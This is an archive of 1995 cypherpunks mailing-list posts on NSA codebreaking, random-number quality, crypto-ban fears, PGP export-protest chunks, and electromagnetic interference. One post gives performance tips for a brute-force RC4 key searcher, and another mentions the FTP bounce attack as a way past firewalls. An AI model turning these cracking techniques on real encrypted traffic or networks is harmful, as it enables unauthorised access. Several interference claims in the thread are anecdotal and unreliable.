Subject: NSA, Random Number Generation, Soviet Codes, Prohibition of Crypto
Message-ID: <Pine.SUN.3.91.950712113043.23433A-100000@access1.digex.net>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

** How a conservative learned to like NPR -


Listening to Public Radio this morning I caught a story about the 
NSA's recent release, or pending release of some 2000 - 2200 
documents bearing decoded Soviet communications.  These were the 
result of a long running communications and signals intelligence 
program conducted by the U.S., and thus, by the NSA and it's 
predecessors.  Some of the documents to be released include 
communications quite damaging to the Rosenbergs, who were executed 
for espionage and selling U.S. atomic "secrets" to the Soviets.  
This is, in fact, the key attraction in the documents.

More interesting than all this was the discussion with the deputy 
director of the NSA in which he described the communications 
collections program which continued from the 1950's all the way 
into the 1980's.  What interested me most, aside the fact that the 
NSA was speaking so candidly, and in my opinion foolishly so, 
about the program (even given their new public relations 
awareness) was a brief discussion of what methods were used in 
cracking the Soviet code.

While it was not defined specifically, it was suggested that the 
majority of the messages were communications between the embassies 
and Moscow.  As a result, the procedural and cryptologic algorithm 
was likely very entrenched as a method, and lacked variation 
because of the massive coordination required to switch methods in 
embassy to home country secure communications.  While I do not 
know how much was puffing, I suspect that it is safe to say that 
the basic method the Soviets were using looked something like 
this.

Plaintext -> Codebook number substitution pass -> One time pad 
pass.

The most difficult, and in the words of the deputy director, 
"remarkable" task was, of course, attacking the last layer in the 
encryption, and the first layer in the decryption process, the 
random series on the one time pad, which, in the words of the 
public spook, "was not so random after all."  The fixed codebook 
substitution perhaps had a high overhead in the initial 
computation, but once analyzed the first time the entire cipher is 
a wash until a new codebook or random number generation method is 
used.

** "Captain, the energy is structured in a pattern I have never 
     before encountered." -

So what does this little disclosure tell us about NSA 
capabilities?

Most obviously that they have extremely sophisticated "random" 
number analysis abilities.  1950-1980 is a long time to practice, 
and develop specialized hardware for this purpose.  The discussion 
of the value of specialized hardware gains having been applied on 
this list to RC4 analysis, its value is still somewhat of a 
mystery to me with reference to random number analysis.

In any event, it is safe to assume that the NSA has a very large 
section dedicated to this entire pursuit, and moreover, that the 
Soviets probably were not "petty" random number generators.  
Perhaps laziness got the best of them, but I am inclined to think 
they conducted this program, at least at first, like any other 
massive communist "for the glory of the state" program--  i.e., 
with crippling dedication.

To me this prompts the questions: How random is random, and how 
random is "cryptographically random?"

I don't know much about the mechanics of cryptographically strong 
random number generation, but considering the enormous effort the 
NSA has put into the analysis of same, I suspect it is in 
everyone's best interest to know more.

Consider:  Now that the NSA has gone public with the program one 
must believe this prima facie evidence that the program is no 
longer of use against the Soviets.  I suspect that a lot of 
dedicated hardware, already paid for, is probably sitting about 
looking for a use.  "Hey Louie Freeh, any idea what we can do with 
all this idle equipment?"

So for the cypherpunks, my first suggestion is a long look at 
exactly how strong the "cryptographically strong" random numbers 
might be.  Certainly we are not random number ignorant, but how 
random number savvy are we?

Perhaps someone with the equipment and the computer time might 
conduct a bit of an experiment.  Maybe lifting the random number 
generators from common cryptographic applications like CryptDisk 
Curve Encrypt, PGP, Secure Device, and taking a massive sample to 
identify trends in the "random" data might be a good idea.

Even those processes that employ some physical component might 
have some trends that could fall into patterns.  Even with hard 
hashes of random seeds, could seed patterns create patterns in the 
actual random data?  I must suspect so.

Perhaps a piece of code which could be distributed far and wide to 
'punks and others which might generate random data on different 
machines with different hardware and different users and generate 
an export file to be submitted to a Web Page or something.  We've 
seen the tremendous value Web Pages have in bringing users 
together to contribute processor time for the RC4 project, what 
about random number generation time?

One of the first attacks on short-wave radio "number stations" 
(for the uninitiated, most are based in South America and read off 
long sets of code numbers, usually in Spanish) was with the 
assumption that a one time pad had been used.  The result?  An 
analyst determined that the "random" numbers for several stations 
were one time padded with "random" poundings on an old typewriter.  
Even if not broken, this immediately identified several stations 
as related by the use of the same one time pad generation method 
(which is sensitive enough that unrelated stations are quite 
unlikely to have been privy to the method) and thus provided 
tremendous traffic analysis information.  What does our random 
data tell the world about us?

Could not the bits in PGP keystroke timing subroutines fall into a 
subtle pattern?  Enough of one to make someone's job a lot easier?  

When you whirl that mouse around the screen to generate random 
numbers for CryptDisk, do you start with a counter clockwise 
circle?  If you're right handed you're likely to.

In the scheme of things, these might be pretty good clues to 
someone who does nothing but random analysis all day long in a 
cubical with a frighteningly quick piece of specialized hardware 
in the next room.

** "He's in a tough position.  If he announces he's running,
     everything becomes a political move, if he announces he
     isn't, his administration becomes a lame duck effort.
     Perhaps he should say nothing" -

My estimation of the NSA's new public image, which amazed me at 
first, prompted me to suggest that the bulk of the hyper-sensitive 
work done there has already been moved to another outfit.  To go 
from "No Such Agency" to a politicized and highly public 
organization with a public relations department and press releases 
in just under 30 years is a dramatic change for a secret agency.

In many ways it is not a poor move.  The agency has grown quite 
large, and it has become impossible to hide.  In addition, the 
public is much more likely to be receptive to an agency which 
appears-- in public-- to have some worth.  Cryptography is a 
complex concept, enigmatic at best for the general public.  The 
public relates much better to the capture of spies and the foiling 
of the Soviet Union than to an agency which is too secret to 
acknowledge.

Public opinion tilting to the NSA might be a bad thing for 
Cypherpunks.  When the NSA says key forfeiture is required, the 
public is much more likely to swallow the pill from an agency that 
uncovers traitors, protects our national interest, and has a cool 
museum that you can visit to boot.

Mr. Young rightly pointed out on this list that part of the coin 
the intelligence community sells, the demand for which moves 
novels by the millions, is the feeling of inclusion in a select 
group, a shared secret.  How elegant the way the National 
Cryptological museum was opened.  No fanfare, no publicity, no 
invitations, just there to be discovered at first, like a little 
secret.  Stuck in an old motel, barely visible from Route 32, 
dwarfed by the massive NSA complex.  Talk about public relations 
coup.  Classic intelligence, release what is worthless or nearly 
worthless, create the impression it is rare, make cursory efforts 
to obscure it- efforts you know will eventually fail, and you have 
created something coveted.  Wait a while, and then when it has 
been discovered, uncovered, publicized, put out a brown and white 
sign:  "National Cryptologic Museum."  What does DeBeers do any 
differently?

So the NSA has become a political tool.  A mouthpiece, and in a 
subtle way, a propaganda machine.  (Just keep the lead counsel out 
of the public eye guys.  He keeps screwing things up.  Do a 
Stephenopolis or Hillary Clinton on him.  Time for him to go 
behind the scenes).

We've long been predicting the clash between crypto and 
government, I doubt government sees it much differently, though 
perhaps through the foggy lenses of a entity used to getting its 
way through coercion.  I suspect they are likely to do themselves 
major damage with simple hubris.

Still, the signs are out there.  They are more and more public 
every day.  I think cryptography scares the administration.  It 
certainly scares the FBI.

So I ask some of the same questions I asked here a few months ago.

Where are the stealth PGP hacks?
Where are the more subtle stego programs?
Why aren't there totally transparent strong crypto programs which
   don't advertise the recipient right in the header?
Why isn't crypto prepared to weather the storm of a outright ban?

Sure, fight on the side of keeping crypto legal, but prepare for 
the worst.

The fact that everyone and their mother drank didn't keep 
prohibition from being initially passed.  How is it people think 
it will be the sure fire crypto ban deterrent?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMAOxEi1onm9OaF05AQEi6Qf/ZW3qZln5SwPonJnf00OZM7DiPrjg/0+R
qzsgolAAnZIr/xFnNP99kzfLf393B5i/8CYO3V0m43VWI4T51b+sBs90Jkiin5hi
dals2aa/hCnMKvGfX1RjBo6OmiPmBhiwtvIOkn+tTda37YSWjYuBJ5DOZhXiuW6S
CUBxoDoE7yQmNy2BVZU9AKibpF3+Mv2k0yR9PlO0Yc0g8Z+juKR5xxUuMgqpy4HJ
qERDYZ6Cd+ADBt/YZGpoESBdishkKfZJeA+J9XApKbR8GiFgeT487ax1/P+Ph+eo
3kMcDEW4O87QbuXa3zewnNrxO306TO04jOeQp6GdJ00IQkRKeru0uw==
=6iZQ
-----END PGP SIGNATURE-----



00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 12 Jul 95 08:40:28 PDT
To: dmandl@bear.com (David Mandl)
Subject: Re: FW: Edupage 7/9/95 (fwd)
In-Reply-To: <199507121418.AA21899@bear-gate.bear.com>
Message-ID: <199507121540.LAA09468@asimov.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dave Mandl wrote:

| For the record: It's Leuchter, Fred Leuchter.
|  
| > ago for "practicing engineering without a license."  A good rebuttal
| > of his report was written up by (I think) William McVey, in Canada.

| Ken McVay.  And dozens of other people too.  The newsgroup is
| alt.revisionism.  If you've got any interest in the "holocaust
| revisionism" phenomenon, it's well worth at least a brief look in
| there.

	Thanks for the corrections, Dave; you're correct on all these
points.

-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Tue, 11 Jul 95 18:41:40 PDT
To: cypherpunks@toad.com
Subject: Re: My Experience with Moderated Lists and Groups
In-Reply-To: <199507111647.JAA01880@ix6.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950712114054.17852M-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 11 Jul 1995, Bill Stewart wrote:

> Remember when the alt.network got started?  One of the first two groups
> that led to its founding was alt.sources [...]
> The other was one of the recipes newsgroups, where there was a bit more
> controversy.

I thought one of them was alt.drugs?

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 08:50:35 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: NSA, Random Number Generation, Soviet Codes, Prohibition of Crypto
In-Reply-To: <Pine.SUN.3.91.950712113043.23433A-100000@access1.digex.net>
Message-ID: <9507121550.AA10682@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn writes:
> More interesting than all this was the discussion with the deputy 
> director of the NSA in which he described the communications 
> collections program which continued from the 1950's all the way 
> into the 1980's.

There may be a misunderstanding -- just to be clear, the implication
was that they were working on some of the 1950s traffic into the
1980s, and not that there was any new traffic available of late...

> In any event, it is safe to assume that the NSA has a very large 
> section dedicated to this entire pursuit, and moreover, that the 
> Soviets probably were not "petty" random number generators.  

I've heard that standard 1920s-1950s one time pad generation
techniques involved telling lots of secretaries in the code section to
type numbers at random onto carbon paper forms. No joke.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Wed, 12 Jul 95 09:58:49 PDT
To: cypherpunks@toad.com
Subject: Re: Don't trust the net too much
In-Reply-To: <Pine.3.89.9507121027.B1475-0100000@khijol>
Message-ID: <doug-9506121658.AA0069320@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>On Wed, 12 Jul 1995, Doug Hughes wrote:
>
>> Go see Winn Schwartau talk about HERF guns sometime. He passed around
>> a picture of a device for < US$500 that could crash any computer within
>> 50 yards..  Then again, it isn't too good for the person firing the gun
>> either.. (mega EM emissions).
>
>That all depends on the power level, and the emission pattern of the 
>device, and the frequency.  I've been working within 10 feet of a dipole 
>being fed by a 1kW amplifier before, and it didn't make me sterile (but 
>it might've loosened a filling or two <grin>).
>
Agree!

>> The parts are available if you know what to get. a VERY enlightening
>> and frightening presentation. I don't think he personally has built one.
>> His presentation contained a presentation on TEMPEST emissions, and
>> low level EM field effects on sensitive equipment problems too (a PBS
>> documentary - a VERY compelling presentation of why you should never
>> use walkman/CD players/radios/electronics equipment on airplanes if
>> they say not to, and you value your life)
>
>This sounds like absolute propoganda.  If you do the calculations, you'll 
>see that a 1 watt transmitter sitting 100 feet away from your target will 
>generate an EMF less than that 1000kW ERP TV transmitter array you just 
>flew over.  If aircraft avionics were *that* sensitive, we'd have planes 
>falling out of the sky, and we don't.  Add to that the HF and VHF 
>transmitting equipment in the cockpit, plus the microwave ovens in the 
>fore and aft, PLUS the phones they have on the plane, and it adds up to a 
>sizeable amount of RF bouncing around the cabin without you and your 2m 
>talkie with it's 6 dB loss rubber duckie.
>
>Now, if every passenger fired up their 2m talkies, that might pose a 
>problem, but then again every passenger wouldn't be using one, would they?
>
>Again, sounds like "we want to totally control your environment for your 
>safety (actually, to minimize our liability)" crap.

If you saw that PBS documentary (they want $20,000 for rebroadcast by the 
way). It was an 87 or 88 or something like that. It would make you
a believer. There was a lady in a van that whenever she used her cellular
phone, her sun's breathing apparatus (lung impaired) went into alarm.
 There was another case at a hospital pre-natal care word near the main
entrance to the hospital. Several occasions when a local bus loop went
by, and the guy happened to be talking on the intercom of the bus, several
of the units in the ward went into alarm and failed (they had a tough time
tracking that one down by the way). 
 Wheel chairs for handicapped people were sensitive. They held a cellular
phone about a foot from a wheel chair control and it started spinning around
and generally going out of control. (The guy's wheel chair had gone out of
control and run him off a heavy slope once and he almost died. it was
unproven whether it was electromagnetic or just a defect).
 This just goes to show that we live in a world of electromagnetic soup.
We really don't know how it effects the body long term, or whether, having
more mission or life critical electronics could be interacting with over
devices. This was the theme of the program.
 Another example was on an airplane (several of them.. older ones mostly
I believe) pilots would occassionally lose instruments (VLS, etc) when
passengers would activate portable transistor radios and such. Particularly
radios.. But there was another case involving a portable computer.. These
cases have been documented. It's a good thing the plain wasn't on a 
landing approach during a storm, or things could've gone very bad very
quickly.
 I heard about the portable computer via a different source. The guy
kept turning his computer on. The instruments would do a little dance.
The captain would tell the stewardess, she would tell the passenger, he
would turn it off for a while. Then, he would turn it on and repeat..
Until finally he refused to turn it off, so they confiscated it and
returned it at the end of the trip. Urban Legend? maybe..

 Believe what you want, but investigate the reports before dissmissing it
out of hand as propaganda. I'd rather stay alive than rely on "theoretically
it shouldn't matter." :)

Keep in mind that newer planes (767, 757) let you do anything you want
while the plane is in flight (but now while landing or takeoff), so they
probably build better instrumentation and cabin shielding into the planes
these days. If they say keep it off, chances are they have a good reason..

If you find categorical evidence to the contrary, I'm sure I would be very
relieved to see it posted here. (rather than wondering if somebody
in one of the 30 rows ahead of me might decide he knows better)

Disclaimer: I have absolutely no idea what kind of shielding goes into
an airplane nor any knowledge of building practices in the airline industry,
but that should be obvious. ;)

Well, I've posted enough on this, and I don't have any evidence besides
what I've seen and what I've heard from others. For all I know the
entire documentary was botched (it was shown on an evening newsmagazine
in the late 80's hosted by Connie Chung - British documentary). Now back 
to your regularly scheduled mailing list already in progress.

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		"Real programmers use cat > file.as"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Ayen <ayen@access.digex.net>
Date: Wed, 12 Jul 95 09:03:47 PDT
To: cypherpunks@toad.com
Subject: Re: Don't trust the net too much
In-Reply-To: <9507121444.AA10523@snark.imsi.com>
Message-ID: <199507121603.MAA04959@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


.pm tolled:
> Doug Hughes writes:
> > Go see Winn Schwartau talk about HERF guns sometime. He passed around
> > a picture of a device for < US$500 that could crash any computer within
> > 50 yards.
> 
> If it costs that little, I'd like to see one demonstrated. I've heard
> of no demonstrations of such things.
> 
> .pm
> 

Hey, if someone will point me at some (free) plans, I'll build one and 
hold a demonstration.

(I've got an old XT, a 286, a 3B1, and some monitors I'd like to blow up, 
and I've not yet blown up a pc using HERF yet (thermite--yes, HE--done 
it, lN2--yep, but not HREF.)

--doug
ayen@access.digex.net 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Wed, 12 Jul 95 11:14:57 PDT
To: perobich@ingr.com
Subject: Re: EMI (was: Re: Don't trust the net too much)
In-Reply-To: <199507121749.AA12206@poboy.b17c.ingr.com>
Message-ID: <Pine.3.89.9507121207.B3180-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Paul Robichaux wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Ed Carp said:
> 
> > This sounds like absolute propoganda.  If you do the calculations, you'll 
> > see that a 1 watt transmitter sitting 100 feet away from your target will 
> > generate an EMF less than that 1000kW ERP TV transmitter array you just 
> > flew over.  If aircraft avionics were *that* sensitive, we'd have planes 
> > falling out of the sky, and we don't. 
> 
> Oh, yes-- we do. The Army lost a small number (two or three) of of
> UH-60 Black Hawks in crashes where the flight control system suddenly
> commanded extreme pitch or attitude changes. Why? In all the crash
> cases, EMI from nearby TV or FM transmitters was found to be the
> proximate cause. The Army, and Sikorsky, immediately went to work to
> better shield the FCS from EMI.
> 
> It's interesting to note that the Navy's SH-60, a UH-60 variant, was
> designed from the start to be EMI-immune. Ships' radars operate in the
> 10-100kW range, and that's a lot of EMI when you're landing 15-20m
> away from the radar mast.

Well, I was speaking of commercial aircraft, not military, but the point 
is taken.  I haven't had occasion to use my packet radio lashup on a 
UH-60 -- yet ;)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Wed, 12 Jul 95 09:49:27 PDT
To: cypherpunks@toad.com
Subject: Re: Num Rat
Message-ID: <199507121652.LAA15243@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>
>I just looked @ the front of a M.O. computer catalog & the numerals in the
>prices are anything but random. A very heavy concentration of eights (8) &
>nines (9), apparently this company is more into $508.98 (color inkjet printer)
>& $38.98 (well known game s/w) than the old late night TV standby of
>"JUST $19.99!". Of course, this is because of excessively documented
>ad nauseum human psychological tendencies that salescritters, who set at
>least the lsd's of price, have been aware of for millenia. I'd bet, that
>5(five), 8(eight), & 9(nine) are significantly more represented across
>the board in prices (& thus in amounts for checks & tax write offs) than
>than their random distribution by Benford's Law or more well known tests
>for randomness would suggest. Has Mr. Negrini factored this into his program?
>I guess the lesson is do a few pgp make__random's & convert a few of the
>hex numbers to dec digits for the lsd's the next time one does creative expense
>reporting.
>
>tjh
>
Just an aside --
  J C Penney invented the $n.95 pricing scheme so that his clerks
would have to make change.  That way they had to use their registers,
recording the sale and the cash didn't just go into their pockets.
Even at that early date, proper security of automated systems depended
largely on human factors.

Buford C. Terrell                       1303 San Jacinto Street
Professor of Law                              Houston, TX 77002
South Texas College of Law                voice   (713)646-1857
terrell@sam.neosoft.com                     fax   (713)646-1766





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Wed, 12 Jul 95 10:54:36 PDT
To: erc@khijol.intele.net (Ed Carp [khijol Sysadmin])
Subject: EMI (was: Re: Don't trust the net too much)
In-Reply-To: <Pine.3.89.9507121027.B1475-0100000@khijol>
Message-ID: <199507121749.AA12206@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Ed Carp said:

> This sounds like absolute propoganda.  If you do the calculations, you'll 
> see that a 1 watt transmitter sitting 100 feet away from your target will 
> generate an EMF less than that 1000kW ERP TV transmitter array you just 
> flew over.  If aircraft avionics were *that* sensitive, we'd have planes 
> falling out of the sky, and we don't. 

Oh, yes-- we do. The Army lost a small number (two or three) of of
UH-60 Black Hawks in crashes where the flight control system suddenly
commanded extreme pitch or attitude changes. Why? In all the crash
cases, EMI from nearby TV or FM transmitters was found to be the
proximate cause. The Army, and Sikorsky, immediately went to work to
better shield the FCS from EMI.

It's interesting to note that the Navy's SH-60, a UH-60 variant, was
designed from the start to be EMI-immune. Ships' radars operate in the
10-100kW range, and that's a lot of EMI when you're landing 15-20m
away from the radar mast.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Do you support free speech even when you don't
perobich@ingr.com            | like what's being said?
		 Be a cryptography user. Ask me how.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAQLM6fb4pLe9tolAQF9NgQAvwOl00o+zwfEsOXClVUgJ8odeHjq5B/Z
+2O8pHo04cSin0wwsrRqdu/3XOwQ6UZpZmw/cnxBglZOnTwVvtoTkb/ZpYhPZr94
6tbnCCMxUb4W/Yiqz4sJ/AF4afxkyn6N9h8U0Hg86vkhYprTqIWL00/k1LDWkQOg
XhpWLcci/vg=
=LLsp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Wed, 12 Jul 95 12:49:09 PDT
To: cypherpunks@toad.com
Subject: Re: Q E D_j a k
Message-ID: <199507121947.MAA28807@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>      The American intelligence establishment today unveiled
>      one of its oldest secrets: how a small team of
>      codebreakers found the first clues that the Soviet Union
>      sought to steal the blueprints for the atomic bomb in

Wow!  They must really be looking for some good publicity these days.
I wonder how much of their motivation is to get PR support for the
black budget, and how much is to support continued crypto export laws?

After all, if the Evil Foreigners had good crypto, the NSA wouldn't
have been able to crack their codes, so therefore it's _vital_ to
_national_security_ that we continue these great laws that are keeping
good crypto securely locked up inside the US borders!

(Yes, I know one-time-pads are provably good crypto, but they also
depend on the security of key distribution and one-time use,
which apparently broke down here.  And the CIA's pretty good at
chasing the guy with briefcases of code material handcuffed to their arms.)

Watch for more pressure from the Administration....
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Wed, 12 Jul 95 10:54:15 PDT
To: cypherpunks@toad.com
Subject: 17 down 696 to go /repost
Message-ID: <Pine.BSI.3.91.950712124927.6968A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Something's wrong with the Primenet Mail server I think.
I'm in pine, off the shell, so I can't sign it.

Love Always,

Carol Anne
                            PGP.ZIP PART [017/713]
                                       
   This just cycles through: when part 713 is reached, part 0 will be
   recycled. We are on export 0 at the moment.
     _________________________________________________________________
   

------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/

   
     _________________________________________________________________
   
    Warning: it may be illegal to use one of these as a sig file in the US
    
   Don't feel obliged to use this chunk just because you have requested
   it. It hardly matters if some parts aren't posted as there are easier
   ways to get PGP, like open ftp sites, from which it is 100% legal for
   both US and non-US people to ftp from. It is merely a political
   statement about the ridiculous nature of ITAR regulations


Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 12 Jul 95 10:53:54 PDT
To: "Jonathan Shekter" <jshekter@alias.com>
Subject: Re: general RC4 key searcher: optimisations anyone?
In-Reply-To: <9507121259.ZM1196@lennon.alias.com>
Message-ID: <9507121753.AA08575@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain



Jonathan Shekter writes:
 > >After all, the kind of really high powered systems that can make a
 > >large dent in the key space are not running Windows NT.
 > 
 > 	Umm... ever hear of an Alpha?

Also, I've been quite impressed with the Pentium times.  It must have
something to do with the "friendliness" towards byte operations in the
Intel architecture.


(Also also, I should note that one can only have sympathy for anybody
trying to run NT on anything *but* a high-powered system :-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jonathan Shekter" <jshekter@alias.com>
Date: Wed, 12 Jul 95 10:00:16 PDT
To: cypherpunks@toad.com
Subject: Re: general RC4 key searcher: optimisations anyone?
Message-ID: <9507121259.ZM1196@lennon.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


>/* RC4 Brute Force Key Searcher, by Andy Brown 1995
>
>This part of the package is meant to be portable between most systems
>so that Unix users can take part in the searching. After all, the
>kind of really high powered systems that can make a large dent in the
>key space are not running Windows NT. You will, however, require

	Umm... ever hear of an Alpha? Besides which, this will compile on NT,
and just about every other OS known to man, so it's a moot point.


>#define SwapByte(a,b) ((a)^=(b),(b)^=(a),(a)^=(b))

	If the two values are in memory (which they are as you swap state
vector elements) then this xor trick requires three read-modify-write cyles --
slow on any architecture. Use a temp variable instead.

>/* prepare the key */
>
>for(counter=0;counter<256;counter++)
>state[counter]=(unsigned char)counter;

	This is bad. Use either a) memcpy as in bruterc4 or b) an unsigned
long, starting at either 0x00010203 or 0x03020100 depending on endianness,
 adding 0x04040404 at each iteration to generate four bytes per shot. Remember,
on most machines a 32-bit store is the same speed as an 8-bit store. The fastes
I have been able to do on this section was obtained by unrolling the loop
manually, and using *two* long variables, alternating, to remove instruction
dependancies.

>for(counter=0;counter<256;counter++)
>
>index2=(key[index1]+state[counter]+index2) & 0xFF;
>SwapByte(state[counter],state[index2]);
>
>if(++index1==keybytes)
>index1=0;

1) This loop needs to be unrolled! Using direct array offsets instead of
incrementing the counter is a speedup on many machines. Also, experiment with
the unroll size. Making it larger increases performance until you get too big
to fit in the cache, at which point it slows down. My experiments on a few
different types of machines showed that unrolling the inner loop 16 or 32 times
was usually about right. See the inner loop of bruterc4. Use macros to do the
unrolling.

2) You can avoid the if statement for checking for key wrap around as follows:
in your initialization, construct an array as follows:

for (i=0; i<keysize-1; i++)
  transtbl[i] = i+1;
transtbl[i] = 0;

Then, after each iteration:

index1 = transtbl[index];

Viola, no if statements, no divides or mods. On many architectures this is
worth the trouble as branches are expensive. Obviously, though, test this



>/* do two RC4 operations as a preliminary test. If this fails then test
>the next one, then the rest. This should result in a lot of rejections
>before the rest of the loop is entered */

	I like the early-out test.

>x=(x+1) & 0xFF;
>y=(state[x]+y) & 0xFF;
>SwapByte(state[x],state[y]);

  Again, swapping with xor probably hurts you here. Use a register temp
variable.


	My personal keycracker accepts general length keys and is not too much
 slower than bruterc4. So it can be done.


	- Jonathan

-- 
    ____________________________________________________
   /   Jonathan Shekter   /                            /
  /   Graphics Hack      /   "Probability alone       /
 /  Alias/Wavefront     /   dictates that I exist"   /
/______________________/____________________________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 12 Jul 95 04:10:14 PDT
To: hobbit@avian.org
Subject: Re: The FTP Bounce Attack
Message-ID: <9507121103.AA14708@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



Also a nice way to walk through firewalls.

Perhaps you could write a SATAN script to check it.
And you should send a copy of your description to
CERT.

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phiberflea@aol.com
Date: Wed, 12 Jul 95 10:17:40 PDT
To: cypherpunks@toad.com
Subject: Free Directory Pinpoints E-Mail Addresses
Message-ID: <950712131505_31185620@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi Team,

Received this little blurb in my e-mail.  

>Free Directory Pinpoints E-Mail Addresses
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>  Palo Alto, Calif. -- ....  Well, SLED Corp. has stepped up to answer the
call of all the Internet
>users who have ever screamed  "How can I find someone's e-mail address?"
>.....
>  The Palo Alto-based company recently released its Four11 Online User
>Directory as a free service for Internet users. The directory is easily
>searched by e-mail, through the use of e-mail forms, or the Web, by using
>browsers such as Mosaic or Lynx. Search parameters include name, location,
>old e-mail address, Group Connection and wildcards.
>...Membership also includes PGP encryption certification and storage
>services. Members who provide proper identification can have their PGP
>public key signed with the SLED Silver Signature. Signed keys are added
>to the key owner's directory listing and can be quickly retrieved by other
>Internet users through either e-mail or the Web. These keys, actually
>small data files, are used to send private messages and verify digital
>signatures. The combination of an Internet wide directory with a PGP key
